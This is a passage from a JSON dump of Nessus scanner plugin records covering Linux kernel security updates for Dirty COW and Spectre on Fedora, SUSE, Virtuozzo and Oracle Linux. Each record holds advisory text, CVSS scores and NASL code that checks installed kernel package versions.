audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nrk_info = get_kb_item(\"Host/readykernel-info\");\nif (empty_or_null(rk_info)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\n\nchecks = make_list2(\n make_array(\n \"kernel\",\"vzkernel-3.10.0-514.26.1.vz7.33.22\",\n \"patch\",\"readykernel-patch-33.22-39.1-2.vl7\"\n )\n);\nreadykernel_execute_checks(checks:checks, severity:SECURITY_HOLE, release:\"Virtuozzo-7\");\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:34:11", "bulletinFamily": "scanner", "description": "Contains several backported bugfixes, including the fix for CVE-2017-1000405\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-02-02T00:00:00", "id": "FEDORA_2017-9EA11E444D.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=105013", "published": "2017-12-05T00:00:00", "title": "Fedora 26 : kernel (2017-9ea11e444d) (Dirty COW)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-9ea11e444d.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105013);\n script_version(\"$Revision: 3.3 $\");\n script_cvs_date(\"$Date: 2018/02/02 14:51:03 $\");\n\n script_cve_id(\"CVE-2017-1000405\");\n script_xref(name:\"FEDORA\", value:\"2017-9ea11e444d\");\n\n script_name(english:\"Fedora 26 : kernel (2017-9ea11e444d) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Contains several backported bugfixes, including the fix for\nCVE-2017-1000405\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-9ea11e444d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/04\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"kernel-4.13.16-202.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:35:37", "bulletinFamily": "scanner", "description": "Contains several backported bugfixes, including the fix for CVE-2017-1000405\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-02-02T00:00:00", "id": "FEDORA_2017-B0C1F44130.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=105954", "published": "2018-01-15T00:00:00", "title": "Fedora 27 : kernel (2017-b0c1f44130) (Dirty COW)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-b0c1f44130.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105954);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2018/02/02 14:59:05 $\");\n\n script_cve_id(\"CVE-2017-1000405\");\n script_xref(name:\"FEDORA\", value:\"2017-b0c1f44130\");\n\n script_name(english:\"Fedora 27 : kernel (2017-b0c1f44130) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Contains several backported bugfixes, including the fix for\nCVE-2017-1000405\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-b0c1f44130\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/04\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"kernel-4.13.16-302.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:34:15", "bulletinFamily": "scanner", "description": "The SUSE Linux Enterprise 12 SP3 kernel was updated to receive various security and bugfixes. The following security bugs were fixed :\n\n - CVE-2017-1000405: A bug in the THP CoW support could be used by local attackers to corrupt memory of other processes and cause them to crash (bnc#1069496).\n\n - CVE-2017-16939: The XFRM dump policy implementation in net/xfrm/xfrm_user.c in the Linux kernel allowed local users to gain privileges or cause a denial of service (use-after-free) via a crafted SO_RCVBUF setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink messages (bnc#1069702).\n\nThe update package also includes non-security fixes. See advisory for details.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-30T00:00:00", "id": "SUSE_SU-2017-3225-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=105072", "published": "2017-12-07T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:3225-1) (Dirty COW)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:3225-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105072);\n script_version(\"3.6\");\n script_cvs_date(\"Date: 2018/11/30 10:54:51\");\n\n script_cve_id(\"CVE-2017-1000405\", \"CVE-2017-16939\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:3225-1) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 12 SP3 kernel was updated to receive various\nsecurity and bugfixes. The following security bugs were fixed :\n\n - CVE-2017-1000405: A bug in the THP CoW support could be\n used by local attackers to corrupt memory of other\n processes and cause them to crash (bnc#1069496).\n\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service\n (use-after-free) via a crafted SO_RCVBUF setsockopt\n system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages (bnc#1069702).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1069496\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1069702\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1070805\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000405/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-16939/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20173225-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?28062366\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP3:zypper in -t patch\nSUSE-SLE-WE-12-SP3-2017-2006=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2017-2006=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2017-2006=1\n\nSUSE Linux Enterprise Live Patching 12-SP3:zypper in -t patch\nSUSE-SLE-Live-Patching-12-SP3-2017-2006=1\n\nSUSE Linux Enterprise High Availability 12-SP3:zypper in -t patch\nSUSE-SLE-HA-12-SP3-2017-2006=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2017-2006=1\n\nSUSE Container as a Service Platform ALL:zypper in -t patch\nSUSE-CAASP-ALL-2017-2006=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! ereg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! ereg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-default-man-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-base-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-base-debuginfo-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-debuginfo-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-debugsource-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-devel-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-syms-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-debugsource-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-devel-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-extra-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-extra-debuginfo-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-syms-4.4.92-6.30.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:35:52", "bulletinFamily": "scanner", "description": "Description of changes:\n\n[4.1.12-112.14.13.el7uek]\n- Revert 'kernel.spec: Require the new microcode_ctl.' (Brian Maly)\n\n[4.1.12-112.14.12.el7uek]\n- xen-blkback: add pending_req allocation stats (Ankur Arora) [Orabug: 27386890]\n- xen-blkback: move indirect req allocation out-of-line (Ankur Arora) [Orabug: 27386890]\n- xen-blkback: pull nseg validation out in a function (Ankur Arora) [Orabug: 27386890]\n- xen-blkback: make struct pending_req less monolithic (Ankur Arora) [Orabug: 27386890]\n- x86: Clean up IBRS functionality resident in common code (Kanth Ghatraju) [Orabug: 27403317]\n- x86: Display correct settings for the SPECTRE_V2 bug (Kanth Ghatraju) [Orabug: 27403317]\n- Set CONFIG_GENERIC_CPU_VULNERABILITIES flag (Kanth Ghatraju) [Orabug: 27403317]\n- x86/cpu: Implement CPU vulnerabilites sysfs functions (Thomas Gleixner) [Orabug: 27403317]\n- sysfs/cpu: Fix typos in vulnerability documentation (David Woodhouse) [Orabug: 27403317]\n- sysfs/cpu: Add vulnerability folder (Thomas Gleixner) [Orabug: 27403317]\n- x86/cpufeatures: Add X86_BUG_SPECTRE_V[12] (David Woodhouse) [Orabug: 27403317]\n- x86/cpufeatures: Add X86_BUG_CPU_MELTDOWN (Kanth Ghatraju) [Orabug: 27403317]\n- KVM: x86: Add memory barrier on vmcs field lookup (Andrew Honig) {CVE-2017-5753}\n- KVM: VMX: remove I/O port 0x80 bypass on Intel hosts (Andrew Honig) [Orabug: 27402301] {CVE-2017-1000407} {CVE-2017-1000407}\n- xfs: give all workqueues rescuer threads (Chris Mason) [Orabug: 27397568]\n- ixgbevf: handle mbox_api_13 in ixgbevf_change_mtu (Joao Martins) [Orabug: 27397001]", "modified": "2018-07-24T00:00:00", "id": "ORACLELINUX_ELSA-2018-4017.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=106225", "published": "2018-01-22T00:00:00", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2018-4017) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2018-4017.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106225);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2018/07/24 18:56:13\");\n\n script_cve_id(\"CVE-2017-1000407\", \"CVE-2017-5753\");\n script_xref(name:\"IAVA\", value:\"2018-A-0020\");\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2018-4017) (Spectre)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[4.1.12-112.14.13.el7uek]\n- Revert 'kernel.spec: Require the new microcode_ctl.' (Brian Maly)\n\n[4.1.12-112.14.12.el7uek]\n- xen-blkback: add pending_req allocation stats (Ankur Arora) [Orabug: \n27386890]\n- xen-blkback: move indirect req allocation out-of-line (Ankur Arora) \n[Orabug: 27386890]\n- xen-blkback: pull nseg validation out in a function (Ankur Arora) \n[Orabug: 27386890]\n- xen-blkback: make struct pending_req less monolithic (Ankur Arora) \n[Orabug: 27386890]\n- x86: Clean up IBRS functionality resident in common code (Kanth \nGhatraju) [Orabug: 27403317]\n- x86: Display correct settings for the SPECTRE_V2 bug (Kanth Ghatraju) \n[Orabug: 27403317]\n- Set CONFIG_GENERIC_CPU_VULNERABILITIES flag (Kanth Ghatraju) [Orabug: \n27403317]\n- x86/cpu: Implement CPU vulnerabilites sysfs functions (Thomas \nGleixner) [Orabug: 27403317]\n- sysfs/cpu: Fix typos in vulnerability documentation (David Woodhouse) \n[Orabug: 27403317]\n- sysfs/cpu: Add vulnerability folder (Thomas Gleixner) [Orabug: 27403317]\n- x86/cpufeatures: Add X86_BUG_SPECTRE_V[12] (David Woodhouse) [Orabug: \n27403317]\n- x86/cpufeatures: Add X86_BUG_CPU_MELTDOWN (Kanth Ghatraju) [Orabug: \n27403317]\n- KVM: x86: Add memory barrier on vmcs field lookup (Andrew Honig) \n{CVE-2017-5753}\n- KVM: VMX: remove I/O port 0x80 bypass on Intel hosts (Andrew Honig) \n[Orabug: 27402301] {CVE-2017-1000407} {CVE-2017-1000407}\n- xfs: give all workqueues rescuer threads (Chris Mason) [Orabug: \n27397568]\n- ixgbevf: handle mbox_api_13 in ixgbevf_change_mtu (Joao Martins) \n[Orabug: 27397001]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2018-January/007463.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2018-January/007464.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/19\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/22\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-4.1.12\") && 